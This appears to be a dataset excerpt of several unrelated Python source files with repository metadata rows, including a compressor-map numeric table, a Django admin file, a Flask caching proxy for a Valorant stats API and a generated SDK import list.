[.9170, .9224, .9264, .9288, .9293, .9280, .9231, .9127, .8962, .8730, .8423],
[.9159, .9171, .9176, .9177, .9171, .9159, .9136, .9097, .9042, .8968, .8876],
[.9061, .9059, .9055, .9052, .9047, .9042, .9036, .9028, .9018, .9007, .8994],
[.8962, .8964, .8965, .8966, .8967, .8968, .8969, .8970, .8971, .8972, .8973]],
[[.8070, .8291, .8461, .8566, .8586, .8497, .8170, .7410, .6022, .3674, .0000],
[.8230, .8454, .8628, .8741, .8775, .8708, .8419, .7732, .6477, .4372, .0916],
[.8411, .8631, .8805, .8921, .8966, .8918, .8671, .8065, .6959, .5124, .2168],
[.8565, .8783, .8957, .9077, .9131, .9099, .8883, .8338, .7340, .5696, .3083],
[.8662, .8879, .9055, .9179, .9239, .9219, .9024, .8520, .7600, .6096, .3739],
[.8699, .8917, .9093, .9218, .9281, .9265, .9080, .8598, .7721, .6297, .4089],
[.8743, .8957, .9130, .9253, .9316, .9304, .9131, .8678, .7858, .6538, .4519],
[.8836, .9026, .9179, .9287, .9342, .9331, .9183, .8804, .8128, .7065, .5485],
[.8943, .9103, .9230, .9319, .9362, .9351, .9231, .8930, .8406, .7602, .6442],
[.9060, .9169, .9253, .9310, .9334, .9321, .9236, .9036, .8703, .8211, .7529],
[.9170, .9224, .9264, .9288, .9293, .9280, .9231, .9127, .8962, .8730, .8423],
[.9159, .9171, .9176, .9177, .9171, .9159, .9136, .9097, .9042, .8968, .8876],
[.9061, .9059, .9055, .9052, .9047, .9042, .9036, .9028, .9018, .9007, .8994],
[.8962, .8964, .8965, .8966, .8967, .8968, .8969, .8970, .8971, .8972, .8973]]])
LPCmap.PRmap = np.array([[[1.0678, 1.0649, 1.0613, 1.0571, 1.0522, 1.0468, 1.0402, 1.0322, 1.0227, 1.0117, 1.0000],
[1.1239, 1.1186, 1.1122, 1.1047, 1.0962, 1.0865, 1.0751, 1.0611, 1.0445, 1.0257, 1.0045],
[1.1994, 1.1910, 1.1809, 1.1691, 1.1558, 1.1409, 1.1233, 1.1020, 1.0771, 1.0488, 1.0173],
[1.2981, 1.2855, 1.2706, 1.2533, 1.2339, 1.2122, 1.1869, 1.1563, 1.1210, 1.0811, 1.0370],
[1.4289, 1.4111, 1.3899, 1.3655, 1.3380, 1.3076, 1.2720, 1.2295, 1.1804, 1.1254, 1.0654],
[1.5118, 1.4909, 1.4661, 1.4375, 1.4052, 1.3695, 1.3278, 1.2779, 1.2205, 1.1565, 1.0868],
[1.6070, 1.5827, 1.5538, 1.5205, 1.4831, 1.4417, 1.3934, 1.3358, 1.2697, 1.1962, 1.1165],
[1.7160, 1.6881, 1.6555, 1.6183, 1.5767, 1.5312, 1.4785, 1.4160, 1.3448, 1.2660, 1.1808],
[1.8402, 1.8086, 1.7724, 1.7318, 1.6869, 1.6381, 1.5824, 1.5170, 1.4430, 1.3615, 1.2736],
[1.9930, 1.9587, 1.9206, 1.8788, 1.8336, 1.7852, 1.7309, 1.6685, 1.5988, 1.5225, 1.4405],
[2.1593, 2.1257, 2.0899, 2.0518, 2.0117, 1.9695, 1.9235, 1.8724, 1.8163, 1.7557, 1.6909],
[2.2764, 2.2510, 2.2248, 2.1978, 2.1701, 2.1416, 2.1118, 2.0801, 2.0464, 2.0108, 1.9735],
[2.3771, 2.3664, 2.3557, 2.3448, 2.3339, 2.3229, 2.3118, 2.3004, 2.2887, 2.2768, 2.2646],
[2.4343, 2.4365, 2.4387, 2.4409, 2.4430, 2.4452, 2.4473, 2.4495, 2.4516, 2.4538, 2.4559]],
[[1.0678, 1.0649, 1.0613, 1.0571, 1.0522, 1.0468, 1.0402, 1.0322, 1.0227, 1.0117, 1.0000],
[1.1239, 1.1186, 1.1122, 1.1047, 1.0962, 1.0865, 1.0751, 1.0611, 1.0445, 1.0257, 1.0045],
[1.1994, 1.1910, 1.1809, 1.1691, 1.1558, 1.1409, 1.1233, 1.1020, 1.0771, 1.0488, 1.0173],
[1.2981, 1.2855, 1.2706, 1.2533, 1.2339, 1.2122, 1.1869, 1.1563, 1.1210, 1.0811, 1.0370],
[1.4289, 1.4111, 1.3899, 1.3655, 1.3380, 1.3076, 1.2720, 1.2295, 1.1804, 1.1254, 1.0654],
[1.5118, 1.4909, 1.4661, 1.4375, 1.4052, 1.3695, 1.3278, 1.2779, 1.2205, 1.1565, 1.0868],
[1.6070, 1.5827, 1.5538, 1.5205, 1.4831, 1.4417, 1.3934, 1.3358, 1.2697, 1.1962, 1.1165],
[1.7160, 1.6881, 1.6555, 1.6183, 1.5767, 1.5312, 1.4785, 1.4160, 1.3448, 1.2660, 1.1808],
[1.8402, 1.8086, 1.7724, 1.7318, 1.6869, 1.6381, 1.5824, 1.5170, 1.4430, 1.3615, 1.2736],
[1.9930, 1.9587, 1.9206, 1.8788, 1.8336, 1.7852, 1.7309, 1.6685, 1.5988, 1.5225, 1.4405],
[2.1593, 2.1257, 2.0899, 2.0518, 2.0117, 1.9695, 1.9235, 1.8724, 1.8163, 1.7557, 1.6909],
[2.2764, 2.2510, 2.2248, 2.1978, 2.1701, 2.1416, 2.1118, 2.0801, 2.0464, 2.0108, 1.9735],
[2.3771, 2.3664, 2.3557, 2.3448, 2.3339, 2.3229, 2.3118, 2.3004, 2.2887, 2.2768, 2.2646],
[2.4343, 2.4365, 2.4387, 2.4409, 2.4430, 2.4452, 2.4473, 2.4495, 2.4516, 2.4538, 2.4559]]])
#LPCmap.Nc_data, LPCmap.alpha_data, LPCmap.Rline_data = np.meshgrid(LPCmap.Nc_vals, LPCmap.alpha_vals, LPCmap.Rline_vals, sparse=False)
LPCmap.Npts = LPCmap.NcMap.size
LPCmap.units = {}
LPCmap.units['NcMap'] = 'rpm'
LPCmap.units['WcMap'] = 'lbm/s'
# format for new regular grid interpolator:
LPCmap.param_data = []
LPCmap.output_data = []
LPCmap.param_data.append({'name': 'alphaMap', 'values': LPCmap.alphaMap,
'default': 0, 'units': None})
LPCmap.param_data.append({'name': 'NcMap', 'values': LPCmap.NcMap,
'default': 1.0, 'units': 'rpm'})
LPCmap.param_data.append({'name': 'RlineMap', 'values': LPCmap.RlineMap,
'default': 2.15, 'units': None})
LPCmap.output_data.append({'name': 'WcMap', 'values': LPCmap.WcMap,
'default': np.mean(LPCmap.WcMap), 'units': 'lbm/s'})
LPCmap.output_data.append({'name': 'effMap', 'values': LPCmap.effMap,
'default': np.mean(LPCmap.effMap), 'units': None})
LPCmap.output_data.append({'name': 'PRmap', 'values': LPCmap.PRmap,
'default': 1.969, 'units': None})
| 69.744361 | 135 | 0.590448 | 1,807 | 9,276 | 3.02269 | 0.317654 | 0.015379 | 0.015379 | 0.011534 | 0.820762 | 0.80227 | 0.80227 | 0.789454 | 0.789454 | 0.789454 | 0 | 0.566336 | 0.153299 | 9,276 | 132 | 136 | 70.272727 | 0.129106 | 0.021453 | 0 | 0.631579 | 0 | 0 | 0.024152 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.017544 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bf2f97bfbb5d736580c0d9ee860fbfb8836a4a37 | 163 | py | Python | backend/api/admin.py | s1071539/hj-quotation | 6181e4a715fae296697b27bf013434d986b10585 | [
"MIT"
] | null | null | null | backend/api/admin.py | s1071539/hj-quotation | 6181e4a715fae296697b27bf013434d986b10585 | [
"MIT"
] | null | null | null | backend/api/admin.py | s1071539/hj-quotation | 6181e4a715fae296697b27bf013434d986b10585 | [
"MIT"
] | null | null | null | from django.contrib import admin
from backend.api.models import User
from backend.api.models import Product
admin.site.register(User)
admin.site.register(Product) | 27.166667 | 38 | 0.834356 | 25 | 163 | 5.44 | 0.48 | 0.161765 | 0.205882 | 0.294118 | 0.382353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08589 | 163 | 6 | 39 | 27.166667 | 0.912752 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1725538a3473560ab34b5372bca4d9200369b842 | 191 | py | Python | ramda/nth_arg_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 56 | 2018-08-06T08:44:58.000Z | 2022-03-17T09:49:03.000Z | ramda/nth_arg_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 28 | 2019-06-17T11:09:52.000Z | 2022-02-18T16:59:21.000Z | ramda/nth_arg_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 5 | 2019-09-18T09:24:38.000Z | 2021-07-21T08:40:23.000Z | from ramda.nth_arg import nth_arg
from ramda.private.asserts import *
def nth_arg_test():
assert_equal(nth_arg(1)("a", "b", "c"), "b")
assert_equal(nth_arg(-1)("a", "b", "c"), "c")
| 23.875 | 49 | 0.633508 | 34 | 191 | 3.323529 | 0.441176 | 0.265487 | 0.247788 | 0.300885 | 0.371681 | 0.371681 | 0.371681 | 0.371681 | 0 | 0 | 0 | 0.01227 | 0.146597 | 191 | 7 | 50 | 27.285714 | 0.680982 | 0 | 0 | 0 | 0 | 0 | 0.041885 | 0 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
175650b2ca3e1f451192e36d672e2d1c5b9d6535 | 5,317 | py | Python | api/server.py | seen-idc/valorant-stats-bot | fd3392300f5b7c5b23668023dc9e12a53237f367 | [
"MIT"
] | 1 | 2021-11-06T11:30:19.000Z | 2021-11-06T11:30:19.000Z | api/server.py | seen-idc/valorant-stats-bot | fd3392300f5b7c5b23668023dc9e12a53237f367 | [
"MIT"
] | null | null | null | api/server.py | seen-idc/valorant-stats-bot | fd3392300f5b7c5b23668023dc9e12a53237f367 | [
"MIT"
] | null | null | null | import time
from flask import Flask, request, jsonify
import pickledb
import requests
app = Flask(__name__)
app.config['JSON_SORT_KEYS'] = False
db = pickledb.load('server.db', True)
@app.route('/valorant/user')
def get_profile():
username = request.args.get('name')
tag = request.args.get('tag')
db_query = 'user:{}:{}'.format(username, tag)
if db.exists(db_query):
lastTime = db.get(db_query)
now = time.time()
if now - lastTime > 900:
req = requests.get('https://api.henrikdev.xyz/valorant/v1/account/{}/{}'.format(username, tag))
db.set(db_query, now)
return jsonify(req.json())
elif db.exists('{}:data'.format(db_query)):
return jsonify(db.get('{}:data'.format(db_query)))
else:
db.set(db_query, now)
req = requests.get('https://api.henrikdev.xyz/valorant/v1/account/{}/{}'.format(username, tag))
return jsonify(req.json())
else:
req = requests.get('https://api.henrikdev.xyz/valorant/v1/account/{}/{}'.format(username, tag))
db.set(db_query, time.time())
return jsonify(req.json())
@app.route('/valorant/mmr-history')
def get_mmr_hist():
username = request.args.get('name')
tag = request.args.get('tag')
region = request.args.get('region')
db_query = 'mmrhist:{}:{}:{}'.format(region, username, tag)
if db.exists(db_query):
lastTime = db.get(db_query)
now = time.time()
if now - lastTime > 1500:
req = requests.get('https://api.henrikdev.xyz/valorant/v1/mmr-history/{}/{}/{}'.format(region, username, tag))
db.set(db_query, now)
return jsonify(req.json())
elif db.exists('{}:data'.format(db_query)):
return jsonify(db.get('{}:data'.format(db_query)))
else:
db.set(db_query, now)
req = requests.get('https://api.henrikdev.xyz/valorant/v1/mmr-history/{}/{}/{}'.format(region, username, tag))
return jsonify(req.json())
else:
req = requests.get('https://api.henrikdev.xyz/valorant/v1/mmr-history/{}/{}/{}'.format(region, username, tag))
db.set(db_query, time.time())
return jsonify(req.json())
@app.route('/valorant/matches')
def get_match_hist():
username = request.args.get('name')
tag = request.args.get('tag')
region = request.args.get('region')
filter = request.args.get('filter')
db_query = 'matchhist:{}:{}:{}:{}'.format(region, username, tag, filter)
if db.exists(db_query):
lastTime = db.get(db_query)
now = time.time()
if now - lastTime > 1500:
req = requests.get('https://api.henrikdev.xyz/valorant/v3/matches/{}/{}/{}?filter={}&size=10'.format(region, username, tag, filter))
db.set(db_query, now)
return jsonify(req.json())
elif db.exists('{}:data'.format(db_query)):
return jsonify(db.get('{}:data'.format(db_query)))
else:
db.set(db_query, now)
req = requests.get('https://api.henrikdev.xyz/valorant/v3/matches/{}/{}/{}?filter={}&size=10'.format(region, username, tag, filter))
return jsonify(req.json())
else:
req = requests.get('https://api.henrikdev.xyz/valorant/v3/matches/{}/{}/{}?filter={}&size=10'.format(region, username, tag, filter))
db.set(db_query, time.time())
return jsonify(req.json())
@app.route('/valorant/store-featured')
def get_bundle():
db_query = 'bundle'
if db.exists(db_query):
lastTime = db.get(db_query)
now = time.time()
if now - lastTime > 21600:
req = requests.get('https://api.henrikdev.xyz/valorant/v1/store-featured')
db.set(db_query, now)
return jsonify(req.json())
elif db.exists('{}:data'.format(db_query)):
return jsonify(db.get('{}:data'.format(db_query)))
else:
db.set(db_query, now)
req = requests.get('https://api.henrikdev.xyz/valorant/v1/store-featured')
return jsonify(req.json())
else:
req = requests.get('https://api.henrikdev.xyz/valorant/v1/store-featured')
db.set(db_query, time.time())
return jsonify(req.json())
@app.route('/valorant/mmr')
def get_mmr():
username = request.args.get('name')
tag = request.args.get('tag')
region = request.args.get('region')
db_query = 'mmr:{}:{}:{}'.format(region, username, tag)
if db.exists(db_query):
lastTime = db.get(db_query)
now = time.time()
if now - lastTime > 900:
req = requests.get('https://api.henrikdev.xyz/valorant/v2/mmr/{}/{}/{}'.format(region, username, tag))
db.set(db_query, now)
return jsonify(req.json())
elif db.exists('{}:data'.format(db_query)):
return jsonify(db.get('{}:data'.format(db_query)))
else:
db.set(db_query, now)
req = requests.get('https://api.henrikdev.xyz/valorant/v2/mmr/{}/{}/{}'.format(region, username, tag))
return jsonify(req.json())
else:
req = requests.get('https://api.henrikdev.xyz/valorant/v2/mmr/{}/{}/{}'.format(region, username, tag))
db.set(db_query, time.time())
return jsonify(req.json())
| 39.385185 | 144 | 0.590182 | 680 | 5,317 | 4.536765 | 0.095588 | 0.090762 | 0.048622 | 0.092383 | 0.895948 | 0.885575 | 0.885575 | 0.885575 | 0.885575 | 0.885575 | 0 | 0.009704 | 0.224751 | 5,317 | 134 | 145 | 39.679104 | 0.738719 | 0 | 0 | 0.798319 | 0 | 0 | 0.215911 | 0.012413 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042017 | false | 0 | 0.033613 | 0 | 0.243697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
176706a787d2b9140c407fa9e5d070d4028c4ac9 | 11,042 | py | Python | accelbyte_py_sdk/api/lobby/wrappers/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/lobby/wrappers/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | 1 | 2021-10-13T03:46:58.000Z | 2021-10-13T03:46:58.000Z | accelbyte_py_sdk/api/lobby/wrappers/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
"""Auto-generated package that contains models used by the justice-lobby-server."""
__version__ = "staging"
__author__ = "AccelByte"
__email__ = "dev@accelbyte.net"
# pylint: disable=line-too-long
from ._chat import admin_chat_history
from ._chat import admin_chat_history_async
from ._chat import get_personal_chat_history_v1_public
from ._chat import get_personal_chat_history_v1_public_async
from ._chat import personal_chat_history
from ._chat import personal_chat_history_async
from ._config import admin_export_config_v1
from ._config import admin_export_config_v1_async
from ._config import admin_get_all_config_v1
from ._config import admin_get_all_config_v1_async
from ._config import admin_get_config_v1
from ._config import admin_get_config_v1_async
from ._config import admin_import_config_v1
from ._config import admin_import_config_v1_async
from ._config import admin_update_config_v1
from ._config import admin_update_config_v1_async
from ._friends import add_friends_without_confirmation
from ._friends import add_friends_without_confirmation_async
from ._friends import get_list_of_friends
from ._friends import get_list_of_friends_async
from ._friends import get_user_friends_updated
from ._friends import get_user_friends_updated_async
from ._friends import get_user_incoming_friends
from ._friends import get_user_incoming_friends_async
from ._friends import get_user_outgoing_friends
from ._friends import get_user_outgoing_friends_async
from ._friends import user_accept_friend_request
from ._friends import user_accept_friend_request_async
from ._friends import user_cancel_friend_request
from ._friends import user_cancel_friend_request_async
from ._friends import user_get_friendship_status
from ._friends import user_get_friendship_status_async
from ._friends import user_reject_friend_request
from ._friends import user_reject_friend_request_async
from ._friends import user_request_friend
from ._friends import user_request_friend_async
from ._friends import user_unfriend_request
from ._friends import user_unfriend_request_async
from ._lobby_operations import admin_join_party_v1
from ._lobby_operations import admin_join_party_v1_async
from ._lobby_operations import admin_update_party_attributes_v1
from ._lobby_operations import admin_update_party_attributes_v1_async
from ._lobby_operations import public_get_messages
from ._lobby_operations import public_get_messages_async
from ._notification import create_notification_template_v1_admin
from ._notification import create_notification_template_v1_admin_async
from ._notification import create_notification_topic_v1_admin
from ._notification import create_notification_topic_v1_admin_async
from ._notification import create_template
from ._notification import create_template_async
from ._notification import create_topic
from ._notification import create_topic_async
from ._notification import delete_notification_template_slug_v1_admin
from ._notification import delete_notification_template_slug_v1_admin_async
from ._notification import delete_notification_topic_v1_admin
from ._notification import delete_notification_topic_v1_admin_async
from ._notification import delete_template_localization
from ._notification import delete_template_localization_async
from ._notification import delete_template_localization_v1_admin
from ._notification import delete_template_localization_v1_admin_async
from ._notification import delete_template_slug
from ._notification import delete_template_slug_async
from ._notification import delete_topic_by_topic_name
from ._notification import delete_topic_by_topic_name_async
from ._notification import free_form_notification
from ._notification import free_form_notification_async
from ._notification import free_form_notification_by_user_id
from ._notification import free_form_notification_by_user_id_async
from ._notification import get_all_notification_templates_v1_admin
from ._notification import get_all_notification_templates_v1_admin_async
from ._notification import get_all_notification_topics_v1_admin
from ._notification import get_all_notification_topics_v1_admin_async
from ._notification import get_game_template
from ._notification import get_game_template_async
from ._notification import get_localization_template
from ._notification import get_localization_template_async
from ._notification import get_notification_topic_v1_admin
from ._notification import get_notification_topic_v1_admin_async
from ._notification import get_single_template_localization_v1_admin
from ._notification import get_single_template_localization_v1_admin_async
from ._notification import get_slug_template
from ._notification import get_slug_template_async
from ._notification import get_template_slug_localizations_template_v1_admin
from ._notification import get_template_slug_localizations_template_v1_admin_async
from ._notification import get_topic_by_namespace
from ._notification import get_topic_by_namespace_async
from ._notification import get_topic_by_topic_name
from ._notification import get_topic_by_topic_name_async
from ._notification import notification_with_template
from ._notification import notification_with_template_async
from ._notification import notification_with_template_by_user_id
from ._notification import notification_with_template_by_user_id_async
from ._notification import publish_template
from ._notification import publish_template_async
from ._notification import publish_template_localization_v1_admin
from ._notification import publish_template_localization_v1_admin_async
from ._notification import send_multiple_users_freeform_notification_v1_admin
from ._notification import send_multiple_users_freeform_notification_v1_admin_async
from ._notification import send_party_freeform_notification_v1_admin
from ._notification import send_party_freeform_notification_v1_admin_async
from ._notification import send_party_templated_notification_v1_admin
from ._notification import send_party_templated_notification_v1_admin_async
from ._notification import send_specific_user_freeform_notification_v1_admin
from ._notification import send_specific_user_freeform_notification_v1_admin_async
from ._notification import send_specific_user_templated_notification_v1_admin
from ._notification import send_specific_user_templated_notification_v1_admin_async
from ._notification import send_users_freeform_notification_v1_admin
from ._notification import send_users_freeform_notification_v1_admin_async
from ._notification import send_users_templated_notification_v1_admin
from ._notification import send_users_templated_notification_v1_admin_async
from ._notification import update_localization_template
from ._notification import update_localization_template_async
from ._notification import update_notification_topic_v1_admin
from ._notification import update_notification_topic_v1_admin_async
from ._notification import update_template_localization_v1_admin
from ._notification import update_template_localization_v1_admin_async
from ._notification import update_topic_by_topic_name
from ._notification import update_topic_by_topic_name_async
from ._party import admin_get_party_data_v1
from ._party import admin_get_party_data_v1_async
from ._party import admin_get_user_party_v1
from ._party import admin_get_user_party_v1_async
from ._party import public_get_party_data_v1
from ._party import public_get_party_data_v1_async
from ._party import public_set_party_limit_v1
from ._party import public_set_party_limit_v1_async
from ._party import public_update_party_attributes_v1
from ._party import public_update_party_attributes_v1_async
from ._player import admin_bulk_block_players_v1
from ._player import admin_bulk_block_players_v1_async
from ._player import admin_get_all_player_session_attribute
from ._player import admin_get_all_player_session_attribute_async
from ._player import admin_get_lobby_ccu
from ._player import admin_get_lobby_ccu_async
from ._player import admin_get_player_blocked_by_players_v1
from ._player import admin_get_player_blocked_by_players_v1_async
from ._player import admin_get_player_blocked_players_v1
from ._player import admin_get_player_blocked_players_v1_async
from ._player import admin_get_player_session_attribute
from ._player import admin_get_player_session_attribute_async
from ._player import admin_set_player_session_attribute
from ._player import admin_set_player_session_attribute_async
from ._player import public_get_player_blocked_by_players_v1
from ._player import public_get_player_blocked_by_players_v1_async
from ._player import public_get_player_blocked_players_v1
from ._player import public_get_player_blocked_players_v1_async
from ._presence import users_presence_handler_v1
from ._presence import users_presence_handler_v1_async
from ._profanity import admin_add_profanity_filter_into_list
from ._profanity import admin_add_profanity_filter_into_list_async
from ._profanity import admin_add_profanity_filters
from ._profanity import admin_add_profanity_filters_async
from ._profanity import admin_create_profanity_list
from ._profanity import admin_create_profanity_list_async
from ._profanity import admin_debug_profanity_filters
from ._profanity import admin_debug_profanity_filters_async
from ._profanity import admin_delete_profanity_filter
from ._profanity import admin_delete_profanity_filter_async
from ._profanity import admin_delete_profanity_list
from ._profanity import admin_delete_profanity_list_async
from ._profanity import admin_get_profanity_list_filters_v1
from ._profanity import admin_get_profanity_list_filters_v1_async
from ._profanity import admin_get_profanity_lists
from ._profanity import admin_get_profanity_lists_async
from ._profanity import admin_get_profanity_rule
from ._profanity import admin_get_profanity_rule_async
from ._profanity import admin_import_profanity_filters_from_file
from ._profanity import admin_import_profanity_filters_from_file_async
from ._profanity import admin_set_profanity_rule_for_namespace
from ._profanity import admin_set_profanity_rule_for_namespace_async
from ._profanity import admin_update_profanity_list
from ._profanity import admin_update_profanity_list_async
from ._profanity import admin_verify_message_profanity_response
from ._profanity import admin_verify_message_profanity_response_async
from ._third_party import admin_create_third_party_config
from ._third_party import admin_create_third_party_config_async
from ._third_party import admin_delete_third_party_config
from ._third_party import admin_delete_third_party_config_async
from ._third_party import admin_get_third_party_config
from ._third_party import admin_get_third_party_config_async
from ._third_party import admin_update_third_party_config
from ._third_party import admin_update_third_party_config_async
| 53.086538 | 83 | 0.906991 | 1,563 | 11,042 | 5.784389 | 0.088292 | 0.089592 | 0.180069 | 0.110497 | 0.960181 | 0.938392 | 0.852561 | 0.608008 | 0.35328 | 0.105187 | 0 | 0.008203 | 0.072632 | 11,042 | 207 | 84 | 53.342995 | 0.874707 | 0.032693 | 0 | 0 | 1 | 0 | 0.003093 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.983784 | 0 | 0.983784 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1779c4b3a676a8733d7f6e73850ab88ee7211bca | 25 | py | Python | hello.py | action-li/python1808 | fcd1bee39227f034fd07bf3ef608f10fd7d39350 | [
"Apache-2.0"
] | null | null | null | hello.py | action-li/python1808 | fcd1bee39227f034fd07bf3ef608f10fd7d39350 | [
"Apache-2.0"
] | null | null | null | hello.py | action-li/python1808 | fcd1bee39227f034fd07bf3ef608f10fd7d39350 | [
"Apache-2.0"
] | null | null | null | print('123')
print('456') | 12.5 | 12 | 0.64 | 4 | 25 | 4 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.04 | 25 | 2 | 13 | 12.5 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
bd7cf88c522ba9d725edcbee8d6dcbdeca80db01 | 104 | py | Python | programs_integrator/config/__init__.py | artudi54/programs-integrator | e86bdebb3e63bf02fbc6923cf3b6efe916147a58 | [
"MIT"
] | 2 | 2019-03-19T09:41:32.000Z | 2020-06-09T22:33:04.000Z | programs_integrator/config/__init__.py | artudi54/programs-integrator | e86bdebb3e63bf02fbc6923cf3b6efe916147a58 | [
"MIT"
] | null | null | null | programs_integrator/config/__init__.py | artudi54/programs-integrator | e86bdebb3e63bf02fbc6923cf3b6efe916147a58 | [
"MIT"
] | null | null | null | from programs_integrator.config.Config import *
from programs_integrator.config.ApplicationDir import *
| 34.666667 | 55 | 0.865385 | 12 | 104 | 7.333333 | 0.5 | 0.272727 | 0.5 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 104 | 2 | 56 | 52 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
bde768c8a29e32247eb0e3f29c671a42f08cec10 | 62 | py | Python | spkeras/utils/__init__.py | mervess/spkeras | 7e127569cbab0c7c0dfeb7ff5a091e63b75ce7b0 | [
"MIT"
] | 12 | 2021-05-17T15:07:31.000Z | 2022-03-11T14:25:51.000Z | spkeras/utils/__init__.py | mervess/spkeras | 7e127569cbab0c7c0dfeb7ff5a091e63b75ce7b0 | [
"MIT"
] | 3 | 2021-06-20T15:24:05.000Z | 2021-12-03T15:39:58.000Z | spkeras/utils/__init__.py | mervess/spkeras | 7e127569cbab0c7c0dfeb7ff5a091e63b75ce7b0 | [
"MIT"
] | 2 | 2021-08-03T09:59:47.000Z | 2021-11-21T23:21:48.000Z | from .utils import save_pickle
from .utils import load_pickle
| 20.666667 | 30 | 0.83871 | 10 | 62 | 5 | 0.6 | 0.36 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 62 | 2 | 31 | 31 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
da14cc747cb4e8adbae3f33f2594412729d08702 | 43 | py | Python | mak/libs/pyxx/cxx/grammar/expression/primary/lambda_expr/__init__.py | motor-dev/Motor | 98cb099fe1c2d31e455ed868cc2a25eae51e79f0 | [
"BSD-3-Clause"
] | 4 | 2015-05-13T16:28:36.000Z | 2017-05-24T15:34:14.000Z | mak/libs/pyxx/cxx/grammar/expression/primary/lambda_expr/__init__.py | motor-dev/Motor | 98cb099fe1c2d31e455ed868cc2a25eae51e79f0 | [
"BSD-3-Clause"
] | null | null | null | mak/libs/pyxx/cxx/grammar/expression/primary/lambda_expr/__init__.py | motor-dev/Motor | 98cb099fe1c2d31e455ed868cc2a25eae51e79f0 | [
"BSD-3-Clause"
] | 1 | 2017-03-21T08:28:07.000Z | 2017-03-21T08:28:07.000Z | from . import capture
